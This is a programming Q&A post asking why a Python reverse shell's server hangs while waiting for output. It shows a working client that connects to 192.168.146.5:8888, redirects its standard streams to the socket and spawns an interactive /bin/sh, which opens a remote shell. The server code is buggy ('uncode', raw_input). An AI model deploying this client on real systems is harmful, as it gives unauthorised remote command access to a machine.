# Reverse Shell Python

Tags: python, sockets

Problems getting data from the client on the server side. I can't understand why ( Freezes at the moment when data is received.

[image]

```
#Server
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('192.168.146.5', 8888))
s.listen(5)
print('Listen...')
client, addr = s.accept()
print('Connect: ',addr)
while 1:
        com = raw_input('Enter comm:')
        client.send(com.uncode('utf-8'))
        if com.lower() == 'exit':
                break
        result = client.recv(2048).decode('utf-8')
        print(result)
client.close()
s.close()
#Client
# coding: utf-8
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.146.5',8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])
```

---

File "server.py", line 13, in 
    result = client.recv(2048).decode('utf-8')

Comment: "Problems getting data" - what are the problems? Please post the _full_ error message

Comment: There is no error. The server just stops at line 13, waits for data from the client, and that's it

Comment: What, no one can help ?